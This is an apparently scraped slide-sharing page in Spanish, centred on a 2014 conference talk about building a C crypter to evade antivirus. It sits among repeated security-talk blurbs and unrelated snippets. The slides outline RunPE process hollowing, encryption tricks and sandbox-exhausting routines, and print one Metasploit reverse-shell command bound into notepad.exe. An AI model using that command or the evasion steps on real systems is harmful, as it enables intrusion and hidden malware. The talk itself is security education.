Charla Desmitificando el AntiVirus en NoCONName 2104 NcN2k14.
Técnicas de evasión de antivirus.
Creación de un Crypter en C
Demo:
* Pruebas crypter
* Ataque ingenieria social: email+word con macro (downloader de Malware protegido con crypter FUD)
Video 1/
http://youtu.be/wPPmRgQNF24
* Ataque 0day con Sandworm (powerpoint)
Video 2/
https://www.youtube.com/watch?v=5hJddep-y80
Video 3/
https://www.youtube.com/watch?v=gZAndZB0Jqk
Charla 'Desmitificando el AntiVirus' Abraham Pasamar, Navaja Negra 2014 #NN4ed CON
Demo:
* Pruebas crypter
* Ataque ingenieria social: email+word con macro (downloader de Malware protegido con crypter FUD)
Video 1/
http://youtu.be/wPPmRgQNF24
* Ataque 0day con Sandworm (powerpoint)
Video 2/
https://www.youtube.com/watch?v=5hJddep-y80
Video 3/
https://www.youtube.com/watch?v=gZAndZB0Jqk
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
Cuando un usuario tiene que elegir una contraseña, tiende a construirla de la misma forma, con la misma información personal como base, y usando las mismas ideas para añadir complejidad a la misma. En este estudio que os mostraremos , nos hicimos con varios miles de millones de contraseñas reales, con el fin de hacer un análisis a gran escala de esos comportamientos comunes, extrayendo conclusiones que nos permitan crear procedimientos y herramientas específicas para mejorar las técnicas actuales de Password Cracking.
Finalmente, usaremos este conocimiento obtenido a través de distintos análisis conductuales y estadísticos para, utilizando redes neuronales y otras técnicas avanzadas, obtener patrones que nos permitan crackear hashes cuya resistencia suele ser bastante alta utilizando otras técnicas.
A veces la diferencia entre poder acceder a un sistema remoto con éxito o fallar puede ser el conocimiento de una herramienta, una línea de comando o incluso una técnica de evasión de AV/Firewall. Esta plática brindará consejos y trucos para poder hackear "like a Boss", que le dará una ventaja durante la auditoría de un sistema
Ponente: Roberto Salgado. Director técnico y co-fundador de Websec México. Roberto ha participado y contribuido en proyectos importantes como ModSecurity, PHPIDS, sqlmap y el libro “Web Application Obfuscation“. Creó la base de conocimientos de inyección SQL, una de las referencias más completas disponibles en la web y Panoptic, un buscador de rutas de archivos comunes con vulnerabilidades tipo LFI. También desarrollo el método más rápido para extraer información de bases de datos vulnerables a inyección a ciegas.
Plática sobre utilizar diferentes técnicas para detener a scanners de seguridad y a la gente que los usa sin pensarlo.
Impartida en CISI 2018, DragonJARCON 2018, 8.8 Bolivia, 8.8 Perú y 8.8 México.
Grabación en video:
https://www.youtube.com/watch?v=NtQpzjgitao&t=1s
Charla 'Desmitificando el AntiVirus' Abraham Pasamar, Navaja Negra 2014 #NN4ed CON
Demo:
* Pruebas crypter
* Ataque ingenieria social: email+word con macro (downloader de Malware protegido con crypter FUD)
Video 1/
http://youtu.be/wPPmRgQNF24
* Ataque 0day con Sandworm (powerpoint)
Video 2/
https://www.youtube.com/watch?v=5hJddep-y80
Video 3/
https://www.youtube.com/watch?v=gZAndZB0Jqk
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
Cuando un usuario tiene que elegir una contraseña, tiende a construirla de la misma forma, con la misma información personal como base, y usando las mismas ideas para añadir complejidad a la misma. En este estudio que os mostraremos , nos hicimos con varios miles de millones de contraseñas reales, con el fin de hacer un análisis a gran escala de esos comportamientos comunes, extrayendo conclusiones que nos permitan crear procedimientos y herramientas específicas para mejorar las técnicas actuales de Password Cracking.
Finalmente, usaremos este conocimiento obtenido a través de distintos análisis conductuales y estadísticos para, utilizando redes neuronales y otras técnicas avanzadas, obtener patrones que nos permitan crackear hashes cuya resistencia suele ser bastante alta utilizando otras técnicas.
A veces la diferencia entre poder acceder a un sistema remoto con éxito o fallar puede ser el conocimiento de una herramienta, una línea de comando o incluso una técnica de evasión de AV/Firewall. Esta plática brindará consejos y trucos para poder hackear "like a Boss", que le dará una ventaja durante la auditoría de un sistema
Ponente: Roberto Salgado. Director técnico y co-fundador de Websec México. Roberto ha participado y contribuido en proyectos importantes como ModSecurity, PHPIDS, sqlmap y el libro “Web Application Obfuscation“. Creó la base de conocimientos de inyección SQL, una de las referencias más completas disponibles en la web y Panoptic, un buscador de rutas de archivos comunes con vulnerabilidades tipo LFI. También desarrollo el método más rápido para extraer información de bases de datos vulnerables a inyección a ciegas.
Plática sobre utilizar diferentes técnicas para detener a scanners de seguridad y a la gente que los usa sin pensarlo.
Impartida en CISI 2018, DragonJARCON 2018, 8.8 Bolivia, 8.8 Perú y 8.8 México.
Grabación en video:
https://www.youtube.com/watch?v=NtQpzjgitao&t=1s
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
¿Qué hacer cuando se publica una nueva vulnerabilidad en un servicio que utilizamos? Veremos una vulnerabilidad reciente, analizaremos el método de explotación y aprenderemos a proteger nuestro servidor vulnerable.
Seguridad & Python: El desarrollo seguro no sólo es cosa de JavaOwaspMadrid Chapter
Hace mucho tiempo que Python dejó de ser un lenguaje de scripting para convertirse en una potente herramienta mucho más genérica: Google, DropBox, Yahoo o NASA, entre otras, puedan dan buena cuenta de ello.
En la charla repasaremos de forma práctica las principales vulnerabilidades, inyecciones y fallos de seguridad causados por la propia implementación y uso frecuente del lenguaje. ¿O pensabas que estas cosas solo eran cosa de Java o PHP? :-P.
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
Información sobre vulnerabilidades recientes y cómo explotarlas. EternalBlue en Windows 7, EternalRomance en Windows 2016, LNK CVE-2017-8464 y SMBLoris en Windows 10. Presentación para alumnos de la UANL Universidad Autónoma de Nuevo León impartida durante el Congreso Internacional de Seguridad de la Información CISI en agosto del 2017.
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]RootedCON
Los cajeros automáticos o ATM (Automatic Teller Machine) son dispositivos cercanos y accesibles a la gente, que permiten la extracción de dinero en efectivo, el ingreso de efectivo en cuenta, así como operaciones entre cuentas. Es por esto que se convierten en un objetivo muy claro para los delincuentes. En nuestro caso nos centramos en los ciberdelincuentes y hacemos un recorrido completo sobre cuáles son los métodos que utilizan, el escenario en el que se encuentran y la exposición de los ATMs ante ellos. Así como un repaso sobre la estructura interna de un ATM, su funcionamiento a nivel de aplicación, vulnerabilidades encontradas durante las auditorias realizadas por los ponentes, además de analisis de malware publico dirigido a estos dispositivos. En la ponencia se tratará de realizar una demo in situ sobre la extracción de dinero, con TLOTA (software a medida para dominarlos a todos) de un cajero físico que se tratará de llevar el día de la ponencia.
Taller: Exploración de redes con Nmap.
Exploración de redes.
○ Conceptos.
○ Fundamentos básicos de Nmap
○ Técnicas de descubrimiento de hosts
○ Identificación de sistemas operativos
Descubrimiento de servicios.
○ Técnicas de escaneo de puertos
○ Identificación de servicios
Detección de vulnerabilidades.
○ Recolección de información
○ Ataques de fuerza bruta
○ Detectando vulnerabilidades en servidores web
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...Software Guru
Ante sucesos recientes tales como las filtraciones de documentos confidenciales de los Estados Unidos (Wikileaks, Edward Snowden) o las vulnerabilidades detectadas en mecanismos criptográficos de alto perfil (SSH de Debian/Ubuntu en 2008, Heartbleed de OpenSSL en 2014), es de especial importancia que los desarrolladores de software cobren mayor conciencia de la importancia de crear software seguro, empleando comunicaciones cifradas.
En esta presentación, buscaré exponer:
Aspectos básicos de operación de los mecansimos criptográficos: Cuáles son los mecanismos principales, y cuándo elegir cada uno.
Presentar algunos casos de software que, a pesar de emplear los mecanismos correctos, lo hace de forma incorrecta —exponiendo, a fin de cuentas, la información que intentaban proteger, confiados por una falsa seguridad.
Semblanza del conferencista:
Gunnar Wolf es profesor en la Facultad de Ingeniería de la UNAM, administrador de sistemas para el Instituto de Investigaciones Económicas de la UNAM, desarrollador en el proyecto DebianGNU/Linux, y miembro del consejo editorial de Software Guru. http://gwolf.org
Charla impartida por Alejandro Ramos de Security By Default, en el I Curso de Verano de Informática Forense de la Facultad de Informática de la Universidad de A Coruña
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
¿Qué hacer cuando se publica una nueva vulnerabilidad en un servicio que utilizamos? Veremos una vulnerabilidad reciente, analizaremos el método de explotación y aprenderemos a proteger nuestro servidor vulnerable.
Seguridad & Python: El desarrollo seguro no sólo es cosa de JavaOwaspMadrid Chapter
Hace mucho tiempo que Python dejó de ser un lenguaje de scripting para convertirse en una potente herramienta mucho más genérica: Google, DropBox, Yahoo o NASA, entre otras, puedan dan buena cuenta de ello.
En la charla repasaremos de forma práctica las principales vulnerabilidades, inyecciones y fallos de seguridad causados por la propia implementación y uso frecuente del lenguaje. ¿O pensabas que estas cosas solo eran cosa de Java o PHP? :-P.
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
Información sobre vulnerabilidades recientes y cómo explotarlas. EternalBlue en Windows 7, EternalRomance en Windows 2016, LNK CVE-2017-8464 y SMBLoris en Windows 10. Presentación para alumnos de la UANL Universidad Autónoma de Nuevo León impartida durante el Congreso Internacional de Seguridad de la Información CISI en agosto del 2017.
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]RootedCON
Los cajeros automáticos o ATM (Automatic Teller Machine) son dispositivos cercanos y accesibles a la gente, que permiten la extracción de dinero en efectivo, el ingreso de efectivo en cuenta, así como operaciones entre cuentas. Es por esto que se convierten en un objetivo muy claro para los delincuentes. En nuestro caso nos centramos en los ciberdelincuentes y hacemos un recorrido completo sobre cuáles son los métodos que utilizan, el escenario en el que se encuentran y la exposición de los ATMs ante ellos. Así como un repaso sobre la estructura interna de un ATM, su funcionamiento a nivel de aplicación, vulnerabilidades encontradas durante las auditorias realizadas por los ponentes, además de analisis de malware publico dirigido a estos dispositivos. En la ponencia se tratará de realizar una demo in situ sobre la extracción de dinero, con TLOTA (software a medida para dominarlos a todos) de un cajero físico que se tratará de llevar el día de la ponencia.
Taller: Exploración de redes con Nmap.
Exploración de redes.
○ Conceptos.
○ Fundamentos básicos de Nmap
○ Técnicas de descubrimiento de hosts
○ Identificación de sistemas operativos
Descubrimiento de servicios.
○ Técnicas de escaneo de puertos
○ Identificación de servicios
Detección de vulnerabilidades.
○ Recolección de información
○ Ataques de fuerza bruta
○ Detectando vulnerabilidades en servidores web
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...Software Guru
Ante sucesos recientes tales como las filtraciones de documentos confidenciales de los Estados Unidos (Wikileaks, Edward Snowden) o las vulnerabilidades detectadas en mecanismos criptográficos de alto perfil (SSH de Debian/Ubuntu en 2008, Heartbleed de OpenSSL en 2014), es de especial importancia que los desarrolladores de software cobren mayor conciencia de la importancia de crear software seguro, empleando comunicaciones cifradas.
En esta presentación, buscaré exponer:
Aspectos básicos de operación de los mecansimos criptográficos: Cuáles son los mecanismos principales, y cuándo elegir cada uno.
Presentar algunos casos de software que, a pesar de emplear los mecanismos correctos, lo hace de forma incorrecta —exponiendo, a fin de cuentas, la información que intentaban proteger, confiados por una falsa seguridad.
Semblanza del conferencista:
Gunnar Wolf es profesor en la Facultad de Ingeniería de la UNAM, administrador de sistemas para el Instituto de Investigaciones Económicas de la UNAM, desarrollador en el proyecto DebianGNU/Linux, y miembro del consejo editorial de Software Guru. http://gwolf.org
Charla impartida por Alejandro Ramos de Security By Default, en el I Curso de Verano de Informática Forense de la Facultad de Informática de la Universidad de A Coruña
Durante la WordCamp Madrid 2019, se plantea una charla poniéndose en la piel de un investigador CSI, aprovechando la experiencia de una analista de seguridad web de Sucuri para aprender como es el proceso para la resolución de un caso en el que una Backdoor estaba haciendo la vida imposible a un cliente.
Poniéndonos en la mente de nuestro enemigo y aplicando los preceptos del Arte de la Guerra, desentrañamos y desmitificamos cómo los sitios WordPress son atacados y lo fácil que puede ser para los sus no cuidan su seguridad.
Charla presentada en la WordCamp Zaragoza 2020
Rafael Otal y Jose L Navarro Adam nos comparten en el #DragonJARCON 2020 una charla titulada "Alta seguridad para clusters críticos" cuya descripción es:
En el workshop corto aprenderemos a montar GLAMP en modo cluster, desde la seguridad perimetral, hasta la motorización, lo que nos permitirá tener un sistema de HA y resiliencia. Para ello montaremos un sistema de múltiples nodos, basados en tecnologías GNU/Linux. Tendremos dos nodos frontales que tendrá un sistema de balanceo de carga con HAProxy y keepalived para tener ips flotantes, dichos nodos serán bastionados para evitar una serie de ataques de fuerza bruta, inyección de sql y XSS. Desde el usuario hasta los nodos frontales se realizará la conexión mediante ssl aprovechando los certificados de Let’s Encrypt. Para aumentar la seguridad de nuestro cluster montaremos un sistema de WAF con modSecurity que recibirá todas las peticiones web y si alguna no es válida la bloqueará. Si la petición es válida la devolverá al HAProxy para enviarla a los nodos GLAMP. Sin embargo, como no nos fiamos del todo de nuestro WAF, diseñaremos nuestro propio servicio de captura de eventos de seguridad que monitorizara: intentos de inicio de sesión SSH, Web, POST y REFERERS enviados a los servidores, y los logs de MALTRAIL para detectar tráfico proveniente de sitios maliciosos y escaneos de red e inyección de código malware. Los eventos capturados serán enviados a los FW de acceso, que en función de las alertas ejecutarán IPTABLES para bloquear paquetes de entrada/salida, y enrutamiento a blackhole (ip r add blackhole) que permite romper la sesión del atacante incluso si ya ha sido establecida, seguir analizando los logs de sus ataques para crear nuevas reglas del WAF, y detener ataques DDoS mediante activación del flag TCP TTL a 30 para provocar el tiempo de vida expirado en tránsito del paquete denegado. Contaremos con 3 nodos internos para GLAMP montados con un sistema de ficheros compartidos mediante GlusterFS, para que todas las máquinas compartan la misma información. El sistema de base de datos lo construiremos con Galera Cluster basados en MariaDB para compartir la información de la base de datos. Tendremos para finalizar un último nodo basado en Prometheus, AlerManager y Grafana para tener información en tiempo real del estado de nuestros nodos y alertas si sucede alguna sobrecarga o caída de algún nodo.
-----------------------------------------------------------------------------------------------
Youtube: DragonJARtv (http://bit.ly/DragonJARtv)
Facebook: La.Comunidad.DragonJAR (http://bit.ly/DragonJARfb)
Twitter: @DragonJAR (http://bit.ly/DragonJARt)
Instagram: Dragon.JAR (http://bit.ly/DragonJARig)
Discord: https://invite.gg/DragonJAR
Blog: Comunidad DragonJAR (http://bit.ly/DragonJAR)
-----------------------------------------------------------------------------------------------
Tecnologías avanzadas de descubrimiento y análisis de la Dark NetJavier Junquera
Presentación de la ponencia "Tecnologías avanzadas de descubrimiento y análisis de la Dark Net" en las XII Jornadas STIC organizadas por el CCN-CERT en 2018
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/talleres/desarrollando-para-nmap-scripting-engine-nse/
Hace 5 años Nmap dió luz a su propio motor de scripts que facilita a administradores de sistema y pentesters ha realizar una variedad impresionante de tareas como recolección de información, detección de servicios y hasta explotación de vulnerabilidades.
Su flexibilidad y poder lo han convertido en una herramienta indispensable, no solo para escaneo de puertos, sino durante todas las etapas de una prueba de penetración.
En este taller los asistentes se familiarizarán con el motor de scripts de Nmap, aprenderán casos de uso avanzado y crearán sus propios scripts. Los participantes desarrollarán módulos para diversos fines incluyendo escaneo, análisis de tráfico y explotación web y de otros dispositivos.
Una pequeña recopilación de ejemplos de hackeos vistas en casos en Sucuri en entornos WordPress. Se plantean también algunas medidas reactivas (qué hacer una vez has sido hackeado) y proactivas (las que se deben hacer antes de que ocurra).
Modificando mensajes de whatsapp en unos pocos 'clics'.
En esta charla se explica que es posible modificar los mensajes de whatsapp y la dificultad que esto representa para muchos peritos que desconocen este tipo de modificaciones y cómo buscar evidencias de dichas técnicas.
VIDEO DEMO: https://www.youtube.com/watch?v=9BTMQSqJy_I
Evading anti virus detection in downloader scripts - zusyINCIDE
AntiVirus protection es not enough. More advanced EndPoint protection is needed. In this presentation you can see how easy is to evade a ZUSY thread (downloader script).
FAQin Congress - 5/3/2016
EDITING WHATSAPP CONTENTS ON A NON JAILBREAK IPHONE OR HOW TO FOOL FORENSIC EXPERTS REPORTS.
Video at slide 38 ! and also here:
DEMO VIDEO: https://youtu.be/9BTMQSqJy_I
Keynote at the security meeting NoConName 2012 (#ncn2k12)
Abraham Pasamar, CEO of INCIDE, gave a keynote called "Avoiding Antivirus: use of Crypters" on November 3rd at the NoConName, the security meeting took place in Barcelona.
Seminario análisis forense - quién se ha llevado mi archivoINCIDE
On 29 March 2012 was held in GILD International Forensics seminar "Who stole my file". We talked about the issue of digital spies and information loss. You can download the PDF at the link below.
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informáticavazquezgarciajesusma
En este proyecto de investigación nos adentraremos en el fascinante mundo de la intersección entre el arte y los medios de comunicación en el campo de la informática.
La rápida evolución de la tecnología ha llevado a una fusión cada vez más estrecha entre el arte y los medios digitales, generando nuevas formas de expresión y comunicación.
Continuando con el desarrollo de nuestro proyecto haremos uso del método inductivo porque organizamos nuestra investigación a la particular a lo general. El diseño metodológico del trabajo es no experimental y transversal ya que no existe manipulación deliberada de las variables ni de la situación, si no que se observa los fundamental y como se dan en su contestó natural para después analizarlos.
El diseño es transversal porque los datos se recolectan en un solo momento y su propósito es describir variables y analizar su interrelación, solo se desea saber la incidencia y el valor de uno o más variables, el diseño será descriptivo porque se requiere establecer relación entre dos o más de estás.
Mediante una encuesta recopilamos la información de este proyecto los alumnos tengan conocimiento de la evolución del arte y los medios de comunicación en la información y su importancia para la institución.
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta in...espinozaernesto427
Las lámparas de alta intensidad de descarga o lámparas de descarga de alta intensidad son un tipo de lámpara eléctrica de descarga de gas que produce luz por medio de un arco eléctrico entre electrodos de tungsteno alojados dentro de un tubo de alúmina o cuarzo moldeado translúcido o transparente.
lámparas más eficientes del mercado, debido a su menor consumo y por la cantidad de luz que emiten. Adquieren una vida útil de hasta 50.000 horas y no generan calor alguna. Si quieres cambiar la iluminación de tu hogar para hacerla mucho más eficiente, ¡esta es tu mejor opción!
Las nuevas lámparas de descarga de alta intensidad producen más luz visible por unidad de energía eléctrica consumida que las lámparas fluorescentes e incandescentes, ya que una mayor proporción de su radiación es luz visible, en contraste con la infrarroja. Sin embargo, la salida de lúmenes de la iluminación HID puede deteriorarse hasta en un 70% durante 10,000 horas de funcionamiento.
Muchos vehículos modernos usan bombillas HID para los principales sistemas de iluminación, aunque algunas aplicaciones ahora están pasando de bombillas HID a tecnología LED y láser.1 Modelos de lámparas van desde las típicas lámparas de 35 a 100 W de los autos, a las de más de 15 kW que se utilizan en los proyectores de cines IMAX.
Esta tecnología HID no es nueva y fue demostrada por primera vez por Francis Hauksbee en 1705. Lámpara de Nernst.
Lámpara incandescente.
Lámpara de descarga. Lámpara fluorescente. Lámpara fluorescente compacta. Lámpara de haluro metálico. Lámpara de vapor de sodio. Lámpara de vapor de mercurio. Lámpara de neón. Lámpara de deuterio. Lámpara xenón.
Lámpara LED.
Lámpara de plasma.
Flash (fotografía) Las lámparas de descarga de alta intensidad (HID) son un tipo de lámparas de descarga de gas muy utilizadas en la industria de la iluminación. Estas lámparas producen luz creando un arco eléctrico entre dos electrodos a través de un gas ionizado. Las lámparas HID son conocidas por su gran eficacia a la hora de convertir la electricidad en luz y por su larga vida útil.
A diferencia de las luces fluorescentes, que necesitan un recubrimiento de fósforo para emitir luz visible, las lámparas HID no necesitan ningún recubrimiento en el interior de sus tubos. El propio arco eléctrico emite luz visible. Sin embargo, algunas lámparas de halogenuros metálicos y muchas lámparas de vapor de mercurio tienen un recubrimiento de fósforo en el interior de la bombilla para mejorar el espectro luminoso y reproducción cromática. Las lámparas HID están disponibles en varias potencias, que van desde los 25 vatios de las lámparas de halogenuros metálicos autobalastradas y los 35 vatios de las lámparas de vapor de sodio de alta intensidad hasta los 1.000 vatios de las lámparas de vapor de mercurio y vapor de sodio de alta intensidad, e incluso hasta los 1.500 vatios de las lámparas de halogenuros metálicos.
Las lámparas HID requieren un equipo de control especial llamado balasto para funcionar
Inteligencia Artificial y Ciberseguridad.pdfEmilio Casbas
Recopilación de los puntos más interesantes de diversas presentaciones, desde los visionarios conceptos de Alan Turing, pasando por la paradoja de Hans Moravec y la descripcion de Singularidad de Max Tegmark, hasta los innovadores avances de ChatGPT, y de cómo la IA está transformando la seguridad digital y protegiendo nuestras vidas.
3Redu: Responsabilidad, Resiliencia y Respetocdraco
¡Hola! Somos 3Redu, conformados por Juan Camilo y Cristian. Entendemos las dificultades que enfrentan muchos estudiantes al tratar de comprender conceptos matemáticos. Nuestro objetivo es brindar una solución inclusiva y accesible para todos.
2. Whoami
Sobre mi:
Abraham Pasamar @apasamar
CEO Inci e apasamar@incide.es
www.incide.es PGP key ID:
0x3ee5fcf7693108b4
d
+10 años seguridad
Computer Forensics
Incident Response
Expert Witness
Pentesting
PASSWORD:
1234567
#NcN2k14 Abraham Pasamar (@apasamar)
3. Efectividad de los Antivirus
Evasión de Antivirus
Crypters C Crypter
DEMO
#NcN2k14 Abraham Pasamar (@apasamar)
6. Antivirus
#NcN2k14 Abraham Pasamar (@apasamar)
¿Nos protegen?
Sí
¿Hasta qué punto?
Todo lo que pueden
respecto de las ‘infecciones’ comunes
y lo que pueden ‘prever’
7. Ataque dirigido (APT)
Cybercriminales
¿Nos protegen?
No mucho
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes
Las defensas convencionales son insuficientes
#NcN2k14 Abraham Pasamar (@apasamar)
8. Ataque dirigido (APT)
Cybercriminales
¿Nos protegen?
No mucho
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes
Las defensas convencionales son insuficientes
#NcN2k14 Abraham Pasamar (@apasamar)
9. Press
#NcN2k14 Abraham Pasamar (@apasamar)
Brian Dye, CEO de Symantec
mayo 2014
Paradigma ha cambiado —> protección AV host/perimetro es insuficiente
10. AV: ¿Cómo funcionan?
Escanean binarios en el DISCO
¿Escanean en MEMORIA? algunos y poco :(
Buscan FIRMAS @ AV BBDD
Buscan TÉCNICAS MALICIOSAS (heurística)
EMULADOR (ejecución parcial) Tiempo Real
#NcN2k14 Abraham Pasamar (@apasamar)
11. ¿Por qué evadir AV’s?
BAD GUYS:
MALWARE = $$$$$$$
Botnets, Ransomware, …
GOOD GUYS:
#NcN2k14 Abraham Pasamar (@apasamar)
APT
Auditoría, Pentesting
13. ¿Cómo evadir AV’s?
Encoders
MALWARE suele ser una pieza compleja.
Packers
Crypter es mucho más simple.
Permite proteger malware detectado.
Crypters
msfpayload windows/shell/
reverse_tcp LHOST=192.168.1.75
LPORT=4444 R | msfencode -c 5
-e x86/shikata_ga_nai -x
notepad.exe > notepad2.exe
REUTILIZACIÓN
TIP:
Método Público = MAL
Método Privado = BIEN
#NcN2k14 Abraham Pasamar (@apasamar)
14. ¿Información sobre Crypters?
Papers
“Abusing File Processing in Malware Detectors for Fun and
Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
“Bypassing Anti-Virus Scanners” (2012)
InterNOT Security Team
#NcN2k14 Abraham Pasamar (@apasamar)
“Hyperion:
Implementation of a PE-Crypter”(2012)
Christian Ammann
http://www.nullsecurity.net/
“One packer to rule them all: Empirical identification,
comparison and circumvention of current Antivirus detection
techniques”(BruCON 2014)
Arne Swinnen,Alaeddine Mesbahi
16. ¿Qué es un Crypter?
Software creado para ocultar código malicioso y hacerlo
indetectable a los antivirus (FUD)
STUB
MALWARE DETECTADO
XOR, RC4, ...
MALWARE CIFRADO
#NcN2k14 Abraham Pasamar (@apasamar)
CRYPTER
(Builder)
STUB
CRYPTER + STUB
exe
dll
recurso
17. Builder / Stub
B u i l de r:
S e e n c a rg a de c om p o n e r e l
n ue v o e je c u t a b l e .
B u i l de r (M a l wa re De te c t a d o) =
St u b + M a l wa re C i f r a d o
St u b:
S e e n c a r g a de :
* De s c i f r a r e l M a l wa re C i f r a d o
* Ej e c u t a r l o d i re c t ame n t e e n
me m o r i a s i n q ue e l M a l wa re
t o q u e e l d i s c o
P i e z a más i m p o r t a n t e
S e e n f re n t a a l o s AV’s
#NcN2k14 Abraham Pasamar (@apasamar)
18. RunPE o Dynamic Forking
CreateProcess
EP 2 ReadFile WriteProcessMemory
#NcN2k14 Abraham Pasamar (@apasamar)
PROCESO
1
(CREATE_SUSPENDED)
GetThreadContext
EP I
PEB EBX
EAX
1
+8 PROCESO
2
BaseAddress 2
ResumeThread SetThreadContext
19. Let’s code a C Crypter
#NcN2k14 Abraham Pasamar (@apasamar)
Builder
MALWARE
STUB MALWARE CIFRADO
C O N T E N E D O R
20. Let’s code a C Crypter
RUTINA DE CIFRADO
#NcN2k14 Abraham Pasamar (@apasamar)
Builder
21. Let’s code a C Crypter
STUB+FIRMA+MALWARE CIFRADO
#NcN2k14 Abraham Pasamar (@apasamar)
Builder
22. Let’s code a C Crypter
Descifrado (decryptbuffer=XOR[buffer])
#NcN2k14 Abraham Pasamar (@apasamar)
Stub
Localizar la FIRMA SEPARADORA
23. Let’s code a C Crypter
Arrancar el proceso en memoria
(Dynamic Forking)
CreateProcess (CREATE_SUSPEND)
#NcN2k14 Abraham Pasamar (@apasamar)
Stub
Estructuras cabecera ejecutable
WriteProcessMemory
ResumeThread
24. Let’s SCAN the Crypter
Multi AV SCAN
#NcN2k14 Abraham Pasamar (@apasamar)
TROJAN SERVER
(Darkcomet). SIN CRYPTER
TROJAN SERVER CRYPTED
(stub+[crypted Darkcomet])
25. Improving the Crypter
:( 13 Signatures … ¿ Qué podemos hacer ?
API HOOKS :)
GetProcAddress
#NcN2k14 Abraham Pasamar (@apasamar)
26. Let’s SCAN the Crypter
Multi AV SCAN
V1 - Original Crypter V2 - API Hooks
#NcN2k14 Abraham Pasamar (@apasamar)
27. Improving the Crypter
Añadiendo soporte para parámetros
main —> WinMain (nCmdLine)
#NcN2k14 Abraham Pasamar (@apasamar)
28. Improving the Crypter
Cambiando la rutina de cifrado
XOR —> byte SWAP
#NcN2k14 Abraham Pasamar (@apasamar)
29. Let’s SCAN the Crypter
Multi AV SCAN
V2 - API Hooks V3 - Parameters & byte Swap
Ooohhh!!!
#NcN2k14 Abraham Pasamar (@apasamar)
30. Improving the Crypter
FIRMAS indican HEURISTICA
¡¡¡ Matemos las firmas heurísticas !!!
Exhausting routine
Emulador —> Time Out
ANTIVIRUS SANDBOX
REAL TIME DETECTION
No es posible procesarlo en tiempo real
#NcN2k14 Abraham Pasamar (@apasamar)
31. Let’s SCAN the Crypter
Multi AV SCAN
V4 - Exhausting Routine
V3 - Parameters & byte Swap
OH YEAH !!!
#NcN2k14 Abraham Pasamar (@apasamar)
32. Improving the Crypter
FIRMAS Estáticas
AVAST
Método de cifrado
Variante: SWAP +/- 1
#NcN2k14 Abraham Pasamar (@apasamar)
33. Improving the Crypter
FIRMAS Estáticas
AVIRA
Firmas Cabecera (CRC/clusterización) - FLAGS Sección
CAMBIAMOS FLAGs
VALOR NO ESPERADO
#NcN2k14 Abraham Pasamar (@apasamar)
34. Let’s SCAN the Crypter
Multi AV SCAN
V4 - Exhausting Routine V6 - Cifrado+ & patch Flags
Awesome!!!
#NcN2k14 Abraham Pasamar (@apasamar)
35. DEMO
Crypter en C (FUD)
Probarlo en un ataque
Ingeniería social (1 click)
Word + Macro (downloader)
Sandworm (0 clicks)
Ejecución FUD-Trojan en TR
#NcN2k14 Abraham Pasamar (@apasamar)
36. Conclusiones
Bypass AVs es POSIBLE
—-> Compromiso INFORMACIÓN
Necesario prestar atención al COMPORTAMIENTO
Algunos elementos a considerar:
Perímetro (callbacks C&C)
SANDBOX
Contexto
#NcN2k14 Abraham Pasamar (@apasamar)
37. Imágenes
Banco Imáges Propio
http://www.gratisography.com/
http://broadbandandsocialjustice.org/
Flickr, user: eviltomthai
Chiswick Chap - Own work
#NcN2k14 Abraham Pasamar (@apasamar)